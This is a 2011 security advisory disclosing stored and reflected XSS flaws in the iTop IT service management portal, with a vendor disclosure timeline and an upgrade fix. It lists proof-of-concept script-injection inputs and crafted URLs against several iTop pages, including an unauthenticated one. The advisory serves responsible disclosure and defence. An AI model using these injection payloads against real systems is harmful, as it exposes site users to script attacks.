TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181

Published: 2011/11/16
Version 1.0

Affected products:
    iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)
    http://sourceforge.net/projects/itop/

References: 
    CVE-2011-4275 - Multiple web-vulnerabilities in iTop
    TC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt
(used for updates)
	
Summary:
    "IT Operations Portal: a complete open source, ITIL, web based 
    service management tool including a fully customizable CMDB, 
    a helpdesk system and a document management tool."
    Several common flaws could be found in iTop like reflected
    and stored XSS.


Vulnerable Scripts:
    stored XSS:
     - almost every tested input field stored in database and in the
html-content of the site. 
	   Especially in case data is reformatted using Javascript, the
sanitisation in place 
	   seems to be overridden.

    reflected XSS:
     - almost every test input field where the value is reflected in
servers output

Examples:
    stored XSS:
      - add a company named "XSS <script>alert("Help Me")</script>"
      - add a database server named "XSS <script>alert("Help
Me")</script>"
      - import a CSV-File where one cell contains "XSS <script>alert("Help
Me")</script>"
      - copy&paste data (which does the same as CSV-import) using
        1;Test 1
        2;Test 2
        3;Test 3<script>alert("23746234243 Test")</script>"

    reflected XSS (un-authenticated):
 
http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help
Me")</script><lala="&suggest_pwd=admin

    reflected XSS (authenticated):
 
http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help
Me")</script><lala="&suggest_pwd=admin
 
http://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help
Me")</script>"
 
http://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note&currentId=Searc
hFormToAdd_document_list \
        &description="<script>alert("Help
Me")</script>"&dosearch=1&name=Acunetix&open=1&operation=search \
        _form&org_id=3&status=draft&type=contract
 
http://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C
/script%3E%22&operation=errors&rule=1
 
http://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894
9560%29%20bad%3d%22&suggest_pwd=test
 
http://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse
over%3dprompt%28972137%29%20bad%3d%22

Possible solutions:
    - use version 1.2 final

Disclosure Timeline:
    2011/08/09 vendor contacted via contact@combodo.com
    2011/08/09 inital vendor response
    2011/09/06 first patch by the vendor
    2011/09/12 second patch by the vendor
    2011/11/16 public disclosure

Credits:
    Tobias Glemser (tglemser@tele-consulting.com)
    Tele-Consulting security networking training GmbH, Germany
    www.tele-consulting.com
    
Disclaimer:
    All information is provided without warranty. The intent is to 
    provide information to secure infrastructure and/or systems, not
    to be able to attack or damage. Therefore Tele-Consulting shall 
    not be liable for any direct or indirect damages that might be 
    caused by using this information.